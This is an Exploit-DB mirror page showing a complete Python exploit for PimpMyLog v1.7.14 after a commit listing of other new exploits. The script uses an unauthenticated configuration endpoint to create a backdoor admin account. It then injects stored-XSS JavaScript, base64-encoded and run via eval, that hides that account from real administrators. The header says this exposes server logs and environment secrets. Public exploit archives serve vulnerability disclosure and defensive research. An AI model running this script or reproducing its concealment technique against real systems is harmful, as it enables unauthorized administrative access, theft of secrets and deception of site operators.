bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51593.py
Exploit-DB 3a3c03321c DB: 2023-07-20 
18 changes to exploits/shellcodes/ghdb

Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution

ABB FlowX v4.00 - Exposure of Sensitive Information

TP-Link TL-WR740N - Authenticated Directory Transversal

Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure

Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
Blackcat Cms v1.4 - Remote Code Execution (RCE)
Blackcat Cms v1.4 - Stored XSS
CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)

Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)

Online Piggery Management System v1.0 - unauthenticated file upload vulnerability

phpfm v1.7.9 - Authentication type juggling

PimpMyLog v1.7.14 - Improper access control

PMB 7.4.6 - SQL Injection

Statamic 4.7.0 - File-Inclusion

Vaidya-Mitra 1.0 - Multiple SQLi
2023-07-20 00:16:46 +00:00

69 lines
No EOL
2.8 KiB
Python
Executable file
Raw Permalink Blame History

# Exploit Title: PimpMyLog v1.7.14 - Improper access control
# Date: 2023-07-10
# Exploit Author: thoughtfault
# Vendor Homepage: https://www.pimpmylog.com/
# Software Link: https://github.com/potsky/PimpMyLog
# Version: 1.5.2-1.7.14
# Tested on: Ubuntu 22.04
# CVE : N/A
# Description: PimpMyLog suffers from improper access control on the account creation endpoint, allowing a remote attacker to create an admin account without any existing permissions. The username is not sanitized and can be leveraged as a vector for stored XSS. This allows the attacker to hide the presence of the backdoor account from legitimate admins. Depending on the previous configuration, an attacker may be able to view sensitive information in apache, iis, nginx, and/or php logs. The attacker can view server-side environmental variables through the debug feature, which may include passwords or api keys.
import requests
import argparse
from base64 import b64encode
js = """var table = document.getElementById("userlisttable");
var rows = table.getElementsByTagName("tr");
for (var i = 0; i < rows.length; i++) {
var cells = rows[i].getElementsByTagName("td");
for (var j = 0; j < cells.length; j++) {
var anchors = cells[j].getElementsByTagName("a");
for (var k = 0; k < anchors.length; k++) {
if (
anchors[k].innerText === "{}" ||
anchors[k].innerText.includes("atob(") ||
anchors[k].querySelector("script") !== null
) {
rows[i].parentNode.removeChild(rows[i]);
}
}
}
}
var userCountElement = document.querySelector('.lead');
var userCountText = userCountElement.textContent;
var userCount = parseInt(userCountText);
if(!isNaN(userCount)){
userCount--;
userCountElement.textContent = userCount + ' Users';
}"""
payload = "<script>eval(atob('{}'));</script>"
def backdoor(url, username, password):
config_url = url + '/inc/configure.php'
print("[*] Creating admin account...")
r = requests.post(config_url, data={'s':'authsave', 'u': username, 'p': password})
if r.status_code != 200:
print("[!] An error occured")
return
print("[*] Hiding admin account...")
base64_js = b64encode(js.format(username).encode()).decode()
xss_payload = payload.format(base64_js)
r = requests.post(config_url, data={'s':'authsave', 'u': xss_payload, 'p': password})
if r.status_code != 200:
print("[!] An error occured")
return
print("[*] Exploit finished!")
parser = argparse.ArgumentParser()
parser.add_argument('--url', help='The base url of the target', required=True)
parser.add_argument('--username', default='backdoor', help='The username of the backdoor account')
parser.add_argument('--password', default='backdoor', help='The password of the backdoor account')
args = parser.parse_args()
backdoor(args.url.rstrip('/'), args.username, args.password)
Reference in a new issue View git blame Copy permalink